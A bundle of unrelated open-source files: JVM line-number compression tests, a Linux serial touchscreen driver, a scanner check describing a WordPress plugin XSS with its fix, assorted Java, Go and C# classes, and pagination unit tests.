 * @param testName Pointer to the test name.
 * @param from first line number offset (inclusive)
 * @param to terminating line number offset (exclusive)
 * @param increment step applied to the line number offset each iteration
 * @return IDATA
 */
static IDATA
testLineNumberCompressionDeltaEncoding(J9PortLibrary *portLib, const char * testName, I_32 from, I_32 to, I_32 increment)
{
	PORT_ACCESS_FROM_PORT(portLib);
	U_8 * buffer = (U_8*)j9mem_allocate_memory(0xFFFF * 5, OMRMEM_CATEGORY_VM); /* maximum memory possibly needed */
	U_8 * bufferPtr;
	I_32 lineNumberOffset, pcOffset;
	J9LineNumber lineNumber;
	J9CfrLineNumberTableEntry lastLineNumberTableEntry;
	/* The PC delta must stay non-negative even when the line delta is negative. */
	I_32 incrementPositive = increment > 0 ? increment : -increment;

	lastLineNumberTableEntry.startPC = 0;
	lastLineNumberTableEntry.lineNumber = 0;

	reportTestEntry(PORTLIB, testName);

	if (NULL == buffer) {
		outputErrorMessage(TEST_ERROR_ARGS, "out of memory error \n" );
		return reportTestExit(PORTLIB, testName);
	}

	bufferPtr = buffer;
	pcOffset = 0;
	/* The pcOffset should always increment, it's delta cannot be negative */
	for (lineNumberOffset = from; lineNumberOffset != to; lineNumberOffset += increment, pcOffset += incrementPositive) {
		J9CfrLineNumberTableEntry lineNumberTableEntry;
		lineNumberTableEntry.startPC = pcOffset;
		lineNumberTableEntry.lineNumber = lineNumberOffset;
		if (!compressLineNumbers(&lineNumberTableEntry, 1, &lastLineNumberTableEntry, &bufferPtr)) {
			outputErrorMessage(TEST_ERROR_ARGS, "error, the line numbers are not in order\n" );
		}
		lastLineNumberTableEntry = lineNumberTableEntry;
	}

	lineNumber.lineNumber = 0;
	lineNumber.location = 0;
	bufferPtr = buffer;
	pcOffset = 0;
	for (lineNumberOffset = from; lineNumberOffset != to; lineNumberOffset += increment, pcOffset += incrementPositive) {
		if (!getNextLineNumberFromTable(&bufferPtr, &lineNumber)) {
			outputErrorMessage(TEST_ERROR_ARGS, "error in getNextLineNumberFromTable, byte format not recognized\n" );
		}
		if ((lineNumber.lineNumber != lineNumberOffset) || (lineNumber.location != pcOffset)) {
			outputErrorMessage(TEST_ERROR_ARGS, "Original lineNumber:%d, location:%d \n",lineNumberOffset, pcOffset);
			outputErrorMessage(TEST_ERROR_ARGS, "Compressed lineNumber:%d, location:%d \n",lineNumber.lineNumber, lineNumber.location);
		}
	}
	j9mem_free_memory(buffer);
	return reportTestExit(PORTLIB, testName);
}
/**
 * Verify that compressLineNumbers rejects an entry whose startPC decreases
 * relative to the previous entry (a negative PC delta is invalid).
 *
 * @param portLib Pointer to the port library.
 * @param testName Pointer to the test name.
 * @return IDATA
 */
static IDATA
testLineNumberCompressionNegativeOffsetError(J9PortLibrary *portLib, const char * testName)
{
	PORT_ACCESS_FROM_PORT(portLib);
	U_8 * buffer = (U_8*)j9mem_allocate_memory(5, OMRMEM_CATEGORY_VM);
	U_8 * bufferPtr = buffer;
	J9CfrLineNumberTableEntry line1, line2;

	/* line2.startPC < line1.startPC: compression must report failure. */
	line1.startPC = 4;
	line1.lineNumber = 4;
	line2.startPC = 3;
	line2.lineNumber = 4;

	/* Report entry before any early exit so that entry/exit reporting stays
	 * balanced, matching the other tests in this file (previously the OOM
	 * path called reportTestExit without a matching reportTestEntry). */
	reportTestEntry(PORTLIB, testName);

	if (NULL == buffer) {
		outputErrorMessage(TEST_ERROR_ARGS, "out of memory error \n" );
		return reportTestExit(PORTLIB, testName);
	}

	if (compressLineNumbers(&line2, 1, &line1, &bufferPtr)) {
		outputErrorMessage(TEST_ERROR_ARGS, "Error, compressLineNumbers should give an error when the startPC are not increasing. \n" );
	}
	j9mem_free_memory(buffer);
	return reportTestExit(PORTLIB, testName);
}
/*
 * Round-trips randomly generated, monotonically increasing line number
 * tables through compressLineNumbers()/getNextLineNumberFromTable() and
 * verifies the decompressed entries match the originals.
 */
static IDATA
testLineNumberRandomCompressionDecompression(J9PortLibrary *portLib, const char * testName)
{
	PORT_ACCESS_FROM_PORT(portLib);
	J9CfrLineNumberTableEntry * bufferOriginal = (J9CfrLineNumberTableEntry*)j9mem_allocate_memory(0xFFFF * sizeof(J9CfrLineNumberTableEntry), OMRMEM_CATEGORY_VM);
	J9CfrLineNumberTableEntry * bufferOriginalPtr;
	U_8 * bufferCompressed = (U_8*)j9mem_allocate_memory(0xFFFF * 5, OMRMEM_CATEGORY_VM); /* 5 bytes is the largest per-entry encoding */
	U_8 * bufferCompressedPtr;
	U_16 countLineNumber;
	UDATA i, pass = 0;
	J9LineNumber lineNumber;
	J9CfrLineNumberTableEntry lineNumberTableEntry;

	reportTestEntry(PORTLIB, testName);

	/* Fix: free whichever buffer did get allocated before bailing out; the
	 * original leaked the sibling buffer on a partial allocation failure. */
	if ((NULL == bufferOriginal) || (NULL == bufferCompressed)) {
		outputErrorMessage(TEST_ERROR_ARGS, "out of memory error \n" );
		if (NULL != bufferOriginal) {
			j9mem_free_memory(bufferOriginal);
		}
		if (NULL != bufferCompressed) {
			j9mem_free_memory(bufferCompressed);
		}
		return reportTestExit(PORTLIB, testName);
	}

	for (pass = 0; pass < 1000000; pass++) {
		countLineNumber = 0;
		bufferCompressedPtr = bufferCompressed;
		bufferOriginalPtr = bufferOriginal;
		lineNumberTableEntry.startPC = 0;
		lineNumberTableEntry.lineNumber = 0;
		lineNumber.lineNumber = 0;
		lineNumber.location = 0;

		/* Build a random non-decreasing table until either field overflows 16 bits. */
		while ((lineNumberTableEntry.startPC < 0xFFFF) && (lineNumberTableEntry.lineNumber < 0xFFFF)) {
			*bufferOriginalPtr = lineNumberTableEntry;
			bufferOriginalPtr++;
			countLineNumber++;
			lineNumberTableEntry.startPC += rand() % 0xFFFF;
			lineNumberTableEntry.lineNumber += rand() % 0xFFFF;
		}

		if (!compressLineNumbers(bufferOriginal, countLineNumber, NULL, &bufferCompressedPtr)) {
			outputErrorMessage(TEST_ERROR_ARGS, "error, the line numbers are not in order\n" );
		}

		/* Decompress and compare entry-by-entry against the original table. */
		bufferCompressedPtr = bufferCompressed;
		bufferOriginalPtr = bufferOriginal;
		for (i = 0; i < countLineNumber; i++) {
			if (!getNextLineNumberFromTable(&bufferCompressedPtr, &lineNumber)) {
				outputErrorMessage(TEST_ERROR_ARGS, "error in getNextLineNumberFromTable, byte format not recognized\n" );
			}
			if ((bufferOriginalPtr->startPC != lineNumber.location) || (bufferOriginalPtr->lineNumber != lineNumber.lineNumber)) {
				outputErrorMessage(TEST_ERROR_ARGS, "The compressed value is different to the original value. \n\
bufferOriginalPtr->startPC(%d) != lineNumber.location(%d) || bufferOriginalPtr->lineNumber(%d) != lineNumber.lineNumber(%d)",
					bufferOriginalPtr->startPC, lineNumber.location, bufferOriginalPtr->lineNumber, lineNumber.lineNumber );
			}
			bufferOriginalPtr++;
		}
	}
	j9mem_free_memory(bufferOriginal);
	j9mem_free_memory(bufferCompressed);
	return reportTestExit(PORTLIB, testName);
}
/*
 * Entry point for the line number compression/decompression tests.
 *
 * A randomSeed of 0 means "seed from the clock"; the chosen seed is echoed
 * so a failing run can be reproduced with 'dyntest -srand:<seed>'.
 * The edge/delta-encoding argument tuples below are inferred from the test
 * names to be (line range, pc range, expected size) -- confirm against the
 * test implementations above before relying on that reading.
 */
IDATA
j9dyn_lineNumber_tests(J9PortLibrary *portLib, int randomSeed)
{
	PORT_ACCESS_FROM_PORT(portLib);
	IDATA rc = 0;
	HEADING(PORTLIB, "j9dyn_lineNumber_tests");
	if (0 == randomSeed) {
		randomSeed = (int) j9time_current_time_millis();
	}
	outputComment(portLib, "NOTE: Run 'dyntest -srand:%d' to reproduce this test manually.\n\n", randomSeed);
	srand(randomSeed);
	rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0 , 0x1F , 0 , 3 , 3 ", 0 , 0x1F , 0 , 3 , 3);
	rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0 , 0x1F , -256 , 0xFF , 1786 ", 0 , 0x1F , -256 , 0xFF , 1786);
	rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0 , 0x7F , -8192 , 0x1FFF, 65533", 0 , 0x7F , -8192 , 0x1FFF, 65533);
	rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0x80 , 0x100 , 0x2000, 0x4000, 40960", 0x80 , 0x100 , 0x2000, 0x4000, 40960);
	rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0x80 , 0x100 , -10192, -8193 , 9995 ", 0x80 , 0x100 , -10192, -8193 , 9995);
	rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0xBFFF, 0xFFFF, 0xBFFF, 0xFFFF, 81920", 0xBFFF, 0xFFFF, 0xBFFF, 0xFFFF, 81920);
	rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0xBFFF, 0xFFFF, -65535, -49150, 81925", 0xBFFF, 0xFFFF, -65535, -49150, 81925);
	rc |= testLineNumberCompressionDeltaEncoding(portLib, "testLineNumberCompressionDeltaEncoding: 0, 0xFFFF, 1 ", 0, 0xFFFF, 1 );
	rc |= testLineNumberCompressionDeltaEncoding(portLib, "testLineNumberCompressionDeltaEncoding: 0xFFFF, 0, -1 ", 0xFFFF, 0, - 1 );
	rc |= testLineNumberCompressionDeltaEncoding(portLib, "testLineNumberCompressionDeltaEncoding: 0, 0xFFFF, 15 ", 0, 0xFFFF, 15 );
	rc |= testLineNumberCompressionDeltaEncoding(portLib, "testLineNumberCompressionDeltaEncoding: 0xFFFF, 0, -15", 0xFFFF, 0, -15);
	rc |= testLineNumberCompressionNegativeOffsetError(portLib, "testLineNumberCompressionNegativeOffsetError");
	rc |= testLineNumberRandomCompressionDecompression(portLib, "testLineNumberRandomCompressionDecompression");
	return rc;
}
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace HearthstoneAI.State
{
// Represents one "entity choice" event parsed from the game log: the set of
// candidate entities a player may pick from, plus bookkeeping about whether
// (and which) choices have already been sent.
public class EntityChoice
{
    // Identifier of this choice event.
    public int id;

    // Kind of choice (string taken from the parsed log) -- exact values
    // depend on the parser; confirm against the log reader.
    public string choice_type;

    // The choosing player: resolved entity id plus its raw textual form.
    public int player_entity_id;
    public string player_entity_str;

    // Textual description of the entity that prompted the choice.
    public string source;

    // Candidate entities, keyed by choice index.
    public Dictionary<int, int> choices = new Dictionary<int, int>();

    // Whether the choices were already sent, and exactly what was sent.
    public bool choices_has_sent = false;
    public List<int> sent_choices = new List<int>();
}
}
| {
"pile_set_name": "Github"
} |
// +build go1.8
package websocket
import (
"crypto/tls"
"net/http/httptrace"
)
// doHandshakeWithTrace runs the TLS handshake, firing the optional
// httptrace callbacks immediately before and after it.
func doHandshakeWithTrace(trace *httptrace.ClientTrace, tlsConn *tls.Conn, cfg *tls.Config) error {
	if start := trace.TLSHandshakeStart; start != nil {
		start()
	}
	err := doHandshake(tlsConn, cfg)
	if done := trace.TLSHandshakeDone; done != nil {
		done(tlsConn.ConnectionState(), err)
	}
	return err
}
| {
"pile_set_name": "Github"
} |
package org.zstack.portal.managementnode;
import org.springframework.web.context.support.WebApplicationContextUtils;
import org.zstack.core.CoreGlobalProperty;
import org.zstack.core.Platform;
import org.zstack.core.cloudbus.CloudBus;
import org.zstack.header.exception.CloudRuntimeException;
import org.zstack.utils.BootErrorLog;
import org.zstack.utils.ExceptionDSL;
import org.zstack.utils.Utils;
import org.zstack.utils.logging.CLogger;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
import static org.zstack.utils.ExceptionDSL.throwableSafe;
/**
 * Servlet context listener that boots the management node when the web
 * application starts and stops it when the context is destroyed.
 */
public class ComponentLoaderWebListener implements ServletContextListener {
    private static final CLogger logger = Utils.getLogger(ComponentLoaderWebListener.class);

    // Set once startup succeeded; guards both a second contextInitialized
    // and stopping a node that never started.
    private static boolean isInit = false;

    private ManagementNodeManager node;
    private CloudBus bus;

    @Override
    public void contextDestroyed(ServletContextEvent arg0) {
        logger.warn("web listener issued context destroy event, start stopping process");
        if (isInit) {
            // throwableSafe presumably logs rather than propagates anything
            // node.stop() throws (see ExceptionDSL) -- confirm; the intent is
            // that container shutdown is never aborted here.
            throwableSafe(new Runnable() {
                @Override
                public void run() {
                    node.stop();
                }
            });
        }
    }

    @Override
    public void contextInitialized(ServletContextEvent event) {
        try {
            if (!isInit) {
                // Build the component loader from the Spring web context, then
                // resolve and start the management node.
                Platform.createComponentLoaderFromWebApplicationContext(WebApplicationContextUtils.getWebApplicationContext(event.getServletContext()));
                node = Platform.getComponentLoader().getComponent(ManagementNodeManager.class);
                bus = Platform.getComponentLoader().getComponent(CloudBus.class);
                node.startNode();
                isInit = true;
            }
        } catch (Throwable t) {
            logger.warn("failed to start management server", t);
            // have to call bus.stop() because its init has been called by spring
            if (bus != null) {
                bus.stop();
            }
            // Record the root cause for post-mortem, then either kill the JVM
            // or rethrow, depending on configuration.
            Throwable root = ExceptionDSL.getRootThrowable(t);
            new BootErrorLog().write(root.getMessage());
            if (CoreGlobalProperty.EXIT_JVM_ON_BOOT_FAILURE) {
                System.exit(1);
            } else {
                throw new CloudRuntimeException(t);
            }
        }
    }
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<WebApplicationTest>
<TestDescription name="Cross site scripting vulnerability in clipboard.swf" version="0.1" released="20080307" updated="20140314" protocol="FTP" mayproxy="false" affects="server" severity="high" alert="success" type="Configuration">
<WASPDescription BindAlertToFile="0" CrawlerProcessingMode="ParseOnly" TargetFormat="" Target="" ModuleName="" Request="" Response="" FullResponse="" DetailsFormat="" Details="" AuthType="0" AuthName="" AuthPass="" CompInfo="" DetaliedInformation="" AlertTags="xss" CVE="" CWE="CWE-79" CVSSVer="2.0" CVSSScore="4.4" CVSSDescr="AV:N/AC:M/Au:N/C:N/I:P/A:N/E:POC/RL:OF/RC:C" CVSSScoreTemp="" CVSSScoreEnv="" CVSS3Descr="CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"></WASPDescription>
<Copyright></Copyright>
<Description>A vulnerability has been reported in the SyntaxHighlighter Evolved plugin for WordPress, which can be exploited by malicious people to conduct cross-site scripting attacks. [break][break]
Certain unspecified input related to syntaxhighlighter2/scripts/clipboard.swf is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.[break][break]
The vulnerability is reported in versions prior to 3.1.6.</Description>
<ApplicableTo>
<Platform>
<OS>*</OS>
<Arch>*</Arch>
</Platform>
<WebServer>*</WebServer>
<ApplicationServer>*</ApplicationServer>
</ApplicableTo>
<Impact>Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account, impersonating the user.
It is also possible to modify the content of the page presented to the user.</Impact>
<Recommendation>Update to version 3.1.6.</Recommendation>
<Reference database="WordPress SyntaxHighlighter Evolved Plugin clipboard.swf Cross-Site Scripting Vulnerability" URL="http://secunia.com/advisories/53235/"></Reference>
</TestDescription>
</WebApplicationTest> | {
"pile_set_name": "Github"
} |
/*
* Sahara TouchIT-213 serial touchscreen driver
*
* Copyright (c) 2007-2008 Claudio Nieder <[email protected]>
*
* Based on Touchright driver (drivers/input/touchscreen/touchright.c)
* Copyright (c) 2006 Rick Koch <[email protected]>
* Copyright (c) 2004 Vojtech Pavlik
* and Dan Streetman <[email protected]>
*/
/*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation.
*/
#include <linux/errno.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/input.h>
#include <linux/serio.h>
#include <linux/init.h>
#define DRIVER_DESC "Sahara TouchIT-213 serial touchscreen driver"
MODULE_AUTHOR("Claudio Nieder <[email protected]>");
MODULE_DESCRIPTION(DRIVER_DESC);
MODULE_LICENSE("GPL");
/*
* Definitions & global arrays.
*/
/*
* Data is received through COM1 at 9600bit/s,8bit,no parity in packets
* of 5 byte each.
*
* +--------+ +--------+ +--------+ +--------+ +--------+
* |1000000p| |0xxxxxxx| |0xxxxxxx| |0yyyyyyy| |0yyyyyyy|
* +--------+ +--------+ +--------+ +--------+ +--------+
* MSB LSB MSB LSB
*
* The value of p is 1 as long as the screen is touched and 0 when
* reporting the location where touching stopped, e.g. where the pen was
* lifted from the screen.
*
* When holding the screen in landscape mode as the BIOS text output is
* presented, x is the horizontal axis with values growing from left to
* right and y is the vertical axis with values growing from top to
* bottom.
*
* When holding the screen in portrait mode with the Sahara logo in its
 * correct position, x is the vertical axis with values growing from
* top to bottom and y is the horizontal axis with values growing from
* right to left.
*/
#define T213_FORMAT_TOUCH_BIT 0x01
#define T213_FORMAT_STATUS_BYTE 0x80
#define T213_FORMAT_STATUS_MASK ~T213_FORMAT_TOUCH_BIT
/*
* On my Sahara Touch-IT 213 I have observed x values from 0 to 0x7f0
* and y values from 0x1d to 0x7e9, so the actual measurement is
* probably done with an 11 bit precision.
*/
#define T213_MIN_XC 0
#define T213_MAX_XC 0x07ff
#define T213_MIN_YC 0
#define T213_MAX_YC 0x07ff
/*
* Per-touchscreen data.
*/
struct touchit213 {
struct input_dev *dev;
struct serio *serio;
int idx;
unsigned char csum;
unsigned char data[5];
char phys[32];
};
/*
 * Assembles the 5-byte packets described above, one byte per call, and
 * emits an input event when a packet completes. Byte 0 is the status byte
 * (0x80 | touch bit); bytes 1-4 carry 7 coordinate bits each, MSB first.
 */
static irqreturn_t touchit213_interrupt(struct serio *serio,
		unsigned char data, unsigned int flags)
{
	struct touchit213 *touchit213 = serio_get_drvdata(serio);
	struct input_dev *dev = touchit213->dev;

	touchit213->data[touchit213->idx] = data;

	/* idx is post-incremented: bytes 1-3 have no case and simply accumulate */
	switch (touchit213->idx++) {
	case 0:
		/* resynchronize: discard bytes until one matches the status pattern */
		if ((touchit213->data[0] & T213_FORMAT_STATUS_MASK) !=
				T213_FORMAT_STATUS_BYTE) {
			pr_debug("unsynchronized data: 0x%02x\n", data);
			touchit213->idx = 0;
		}
		break;

	case 4:
		/* packet complete: rebuild the 14-bit coordinates and report */
		touchit213->idx = 0;
		input_report_abs(dev, ABS_X,
			(touchit213->data[1] << 7) | touchit213->data[2]);
		input_report_abs(dev, ABS_Y,
			(touchit213->data[3] << 7) | touchit213->data[4]);
		input_report_key(dev, BTN_TOUCH,
			touchit213->data[0] & T213_FORMAT_TOUCH_BIT);
		input_sync(dev);
		break;
	}

	return IRQ_HANDLED;
}
/*
 * touchit213_disconnect() is the opposite of touchit213_connect()
 */

static void touchit213_disconnect(struct serio *serio)
{
	struct touchit213 *touchit213 = serio_get_drvdata(serio);

	/* hold a reference so the input device outlives unregistration,
	 * then drop it once we are done touching it */
	input_get_device(touchit213->dev);
	input_unregister_device(touchit213->dev);
	serio_close(serio);
	serio_set_drvdata(serio, NULL);
	input_put_device(touchit213->dev);
	kfree(touchit213);
}
/*
 * touchit213_connect() is the routine that is called when someone adds a
 * new serio device that supports the Touch-iT213 protocol and registers it
 * as an input device.
 */

static int touchit213_connect(struct serio *serio, struct serio_driver *drv)
{
	struct touchit213 *touchit213;
	struct input_dev *input_dev;
	int err;

	touchit213 = kzalloc(sizeof(struct touchit213), GFP_KERNEL);
	input_dev = input_allocate_device();
	if (!touchit213 || !input_dev) {
		err = -ENOMEM;
		goto fail1;
	}

	touchit213->serio = serio;
	touchit213->dev = input_dev;
	snprintf(touchit213->phys, sizeof(touchit213->phys),
		 "%s/input0", serio->phys);

	input_dev->name = "Sahara Touch-iT213 Serial TouchScreen";
	input_dev->phys = touchit213->phys;
	input_dev->id.bustype = BUS_RS232;
	input_dev->id.vendor = SERIO_TOUCHIT213;
	input_dev->id.product = 0;
	input_dev->id.version = 0x0100;
	input_dev->dev.parent = &serio->dev;
	/* absolute positioning plus a single touch button */
	input_dev->evbit[0] = BIT_MASK(EV_KEY) | BIT_MASK(EV_ABS);
	input_dev->keybit[BIT_WORD(BTN_TOUCH)] = BIT_MASK(BTN_TOUCH);
	input_set_abs_params(touchit213->dev, ABS_X,
		T213_MIN_XC, T213_MAX_XC, 0, 0);
	input_set_abs_params(touchit213->dev, ABS_Y,
		T213_MIN_YC, T213_MAX_YC, 0, 0);

	serio_set_drvdata(serio, touchit213);

	err = serio_open(serio, drv);
	if (err)
		goto fail2;

	err = input_register_device(touchit213->dev);
	if (err)
		goto fail3;

	return 0;

	/* error unwinding: labels fall through, undoing setup in reverse order */
 fail3:	serio_close(serio);
 fail2:	serio_set_drvdata(serio, NULL);
 fail1:	input_free_device(input_dev);
	kfree(touchit213);
	return err;
}
/*
 * The serio driver structure.
 */

/* bind to any RS232 serio port announcing the Touch-iT213 protocol */
static struct serio_device_id touchit213_serio_ids[] = {
	{
		.type	= SERIO_RS232,
		.proto	= SERIO_TOUCHIT213,
		.id	= SERIO_ANY,
		.extra	= SERIO_ANY,
	},
	{ 0 }
};

MODULE_DEVICE_TABLE(serio, touchit213_serio_ids);

static struct serio_driver touchit213_drv = {
	.driver		= {
		.name	= "touchit213",
	},
	.description	= DRIVER_DESC,
	.id_table	= touchit213_serio_ids,
	.interrupt	= touchit213_interrupt,
	.connect	= touchit213_connect,
	.disconnect	= touchit213_disconnect,
};
/*
 * The functions for inserting/removing us as a module.
 * Devices themselves are created/destroyed via connect()/disconnect()
 * when a matching serio port appears or goes away.
 */

static int __init touchit213_init(void)
{
	return serio_register_driver(&touchit213_drv);
}

static void __exit touchit213_exit(void)
{
	serio_unregister_driver(&touchit213_drv);
}

module_init(touchit213_init);
module_exit(touchit213_exit);
| {
"pile_set_name": "Github"
} |
package net.ripe.db.whois.common.support;
import org.hamcrest.BaseMatcher;
import org.hamcrest.Description;
import java.util.Arrays;
/**
 * Hamcrest matcher that matches byte arrays containing a given byte
 * sequence, with static helpers for raw byte-array searching.
 */
public class ByteArrayContains extends BaseMatcher<byte[]> {

    /** The byte sequence searched for in the examined array. */
    private final byte[] needle;

    public ByteArrayContains(byte[] needle) {
        this.needle = needle;
    }

    /** Returns the index of the first occurrence of needle in haystack, or -1. */
    public static final int indexOf(byte[] haystack, byte[] needle) {
        return indexOf(haystack, needle, 0);
    }

    /**
     * Returns the index of the first occurrence of needle in haystack at or
     * after frompos, or -1 when absent.
     */
    public static final int indexOf(byte[] haystack, byte[] needle, int frompos) {
        // Fix: the last valid start index is haystack.length - needle.length,
        // independent of frompos. The previous bound also subtracted frompos,
        // which silently truncated the search window whenever frompos > 0 and
        // missed matches near the end of the haystack.
        int lastStart = haystack.length - needle.length;

        outer:
        for (int i = frompos; i <= lastStart; i++) {
            for (int j = 0; j < needle.length; j++) {
                if (haystack[i + j] != needle[j]) {
                    continue outer;
                }
            }
            return i;
        }
        return -1;
    }

    /* Searches through haystack, returns index of first occurrence of needle,
     * while ignoring ignoredChars from haystack.
     * NOTE(review): the lastMatch bound limits the scan *position*, so a match
     * whose tail lies beyond haystack.length - needle.length because ignored
     * characters are interspersed is not found. Confirm whether that is the
     * intended semantics before changing it. */
    public static final int indexOfIgnoring(byte[] haystack, byte[] needle, int frompos, byte[] ignoredChars) {
        int lastMatch = haystack.length - needle.length;
        if (lastMatch < frompos) {
            return -1;
        }

        int hayind = frompos;   // current scan position in haystack
        int haymatch = frompos; // start of the candidate match
        int needind = 0;        // how many needle bytes matched so far

        outer:
        while (hayind <= lastMatch) {
            // skip ignored characters
            for (byte ignoredChar : ignoredChars) {
                if (haystack[hayind] == ignoredChar) {
                    hayind++;
                    continue outer;
                }
            }

            // check if the next char in needle matches haystack
            if (haystack[hayind] == needle[needind]) {
                needind++;
                // check if reached end of needle
                if (needind >= needle.length) {
                    return haymatch;
                }
            } else { // reset counters
                needind = 0;
                haymatch = hayind + 1;
            }
            hayind++;
        }
        return -1;
    }

    @Override
    public boolean matches(Object haystack) {
        // hamcrest passes the examined item; a non-byte[] argument throws CCE
        return indexOf((byte[]) haystack, needle) >= 0;
    }

    @Override
    public void describeTo(Description description) {
        description.appendText("contains(" + Arrays.toString(needle) + ")");
    }
}
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Threading.Tasks;
using Xunit;
namespace X.PagedList.Tests
{
/// <summary>
/// Tests for PagedList construction and its paging metadata:
/// page counts, first/last item indexes, and navigation flags
/// (HasNextPage, IsLastPage, ...).
/// </summary>
public class PagedListFacts
{
    //[Fact]
    //public void Null_Data_Set_Doesnt_Throw_Exception()
    //{
    //    //act
    //    Assert.ThrowsDelegate act = () => new PagedList<object>(null, 1, 10);

    //    //assert
    //    Assert.DoesNotThrow(act);
    //}

    [Fact]
    public void PageNumber_Below_One_Throws_ArgumentOutOfRange()
    {
        //arrange
        var data = new[] { 1, 2, 3 };

        //act
        Action action = () => data.ToPagedList(0, 1);

        //assert
        Assert.Throws<ArgumentOutOfRangeException>(action);
    }

    [Fact]
    public async Task Argument_out_of_range()
    {
        var queryable = (new List<Object>()).AsQueryable();
        var list = await queryable.ToListAsync();
        var pagedList = list.ToPagedList();

        Assert.NotNull(pagedList);
    }

    [Fact]
    public void Split_Works()
    {
        //arrange
        var list = Enumerable.Range(1, 47);

        //act
        var splitList = list.Split(5).ToList();

        //assert: 47 items in 5 chunks -> four of 10 and a final chunk of 7
        Assert.Equal(5, splitList.Count());
        Assert.Equal(10, splitList.ElementAt(0).Count());
        Assert.Equal(10, splitList.ElementAt(1).Count());
        Assert.Equal(10, splitList.ElementAt(2).Count());
        Assert.Equal(10, splitList.ElementAt(3).Count());
        Assert.Equal(7, splitList.ElementAt(4).Count());
    }

    [Fact]
    public void Key_Selector_Works()
    {
        var collection = Enumerable.Range(1, 1000000);
        var pageNumber = 2;
        var pageSize = 10;

        // Order maps evens to key 1 and odds to key 10, so all evens sort
        // first; page 2 (size 10) is therefore the evens 22..40.
        Expression<Func<int, int>> keySelector = i => Order(i);

        var list = collection.ToPagedList(keySelector, pageNumber, pageSize);

        Assert.Equal(22, list.ElementAt(0));
        Assert.Equal(24, list.ElementAt(1));
        Assert.Equal(26, list.ElementAt(2));
        Assert.Equal(28, list.ElementAt(3));
        Assert.Equal(30, list.ElementAt(4));
        Assert.Equal(32, list.ElementAt(5));
        Assert.Equal(34, list.ElementAt(6));
        Assert.Equal(36, list.ElementAt(7));
        Assert.Equal(38, list.ElementAt(8));
        Assert.Equal(40, list.ElementAt(9));
    }

    // Sort key helper: even -> 1, odd -> 10 (evens order before odds).
    private static int Order(int i)
    {
        //
        return i % 2 == 0 ? 1 : 10;
    }

    [Fact]
    public void PageNumber_Above_RecordCount_Returns_Empty_List()
    {
        //arrange
        var data = new[] { 1, 2, 3 };

        //act
        var pagedList = data.ToPagedList(2, 3);

        //assert
        Assert.Equal(0, pagedList.Count);
    }

    [Fact]
    public void PageSize_Below_One_Throws_ArgumentOutOfRange()
    {
        //arrange
        var data = new[] {1, 2, 3};

        //act
        Action action = () => data.ToPagedList(1, 0);

        //assert
        Assert.Throws<ArgumentOutOfRangeException>(action);
    }

    [Fact]
    public void Null_Data_Set_Doesnt_Return_Null()
    {
        //act
        var pagedList = new PagedList<object>(null, 1, 10);

        //assert
        Assert.NotNull(pagedList);
    }

    [Fact]
    public void Null_Data_Set_Returns_Zero_Pages()
    {
        //act
        var pagedList = new PagedList<object>(null, 1, 10);

        //assert
        Assert.Equal(0, pagedList.PageCount);
    }

    [Fact]
    public void Zero_Item_Data_Set_Returns_Zero_Pages()
    {
        //arrange
        var data = new List<object>();

        //act
        var pagedList = data.ToPagedList(1, 10);

        //assert
        Assert.Equal(0, pagedList.PageCount);
    }

    [Fact]
    public void DataSet_Of_One_Through_Five_PageSize_Of_Two_PageNumber_Of_Two_First_Item_Is_Three()
    {
        //arrange
        var data = new[] { 1, 2, 3, 4, 5 };

        //act
        var pagedList = data.ToPagedList(2, 2);

        //assert
        Assert.Equal(3, pagedList[0]);
    }

    [Fact]
    public void TotalCount_Is_Preserved()
    {
        //arrange
        var data = new[] { 1, 2, 3, 4, 5 };

        //act
        var pagedList = data.ToPagedList(2, 2);

        //assert
        Assert.Equal(5, pagedList.TotalItemCount);
    }

    [Fact]
    public void PageSize_Is_Preserved()
    {
        //arrange
        var data = new[] { 1, 2, 3, 4, 5 };

        //act
        var pagedList = data.ToPagedList(2, 2);

        //assert
        Assert.Equal(2, pagedList.PageSize);
    }

    [Fact]
    public void Data_Is_Filtered_By_PageSize()
    {
        //arrange
        var data = new[] { 1, 2, 3, 4, 5 };

        //act
        var pagedList = data.ToPagedList(2, 2);

        //assert
        Assert.Equal(2, pagedList.Count);

        //### related test below

        //act: last page holds only the remainder
        pagedList = data.ToPagedList(3, 2);

        //assert
        Assert.Equal(1, pagedList.Count);
    }

    [Fact]
    public void DataSet_OneThroughSix_PageSize_Three_PageNumber_One_FirstValue_Is_One()
    {
        //arrange
        var data = new[] { 1, 2, 3, 4, 5, 6 };

        //act
        var pagedList = data.ToPagedList(1, 3);

        //assert
        Assert.Equal(1, pagedList[0]);
    }

    [Fact]
    public void DataSet_OneThroughThree_PageSize_One_PageNumber_Three_HasNextPage_False()
    {
        //arrange
        var data = new[] { 1, 2, 3 };

        //act
        var pagedList1 = data.ToPagedList(2, 1);
        var pagedList2 = data.ToPagedList(3, 1);
        var pagedList3 = data.ToPagedList(4, 1);

        //assert
        Assert.True(pagedList1.HasNextPage);
        Assert.False(pagedList2.HasNextPage);
        Assert.False(pagedList3.HasNextPage);
    }

    [Fact]
    public void DataSet_OneThroughThree_PageSize_One_PageNumber_Three_IsLastPage_True()
    {
        //arrange
        var data = new[] { 1, 2, 3 };

        //act
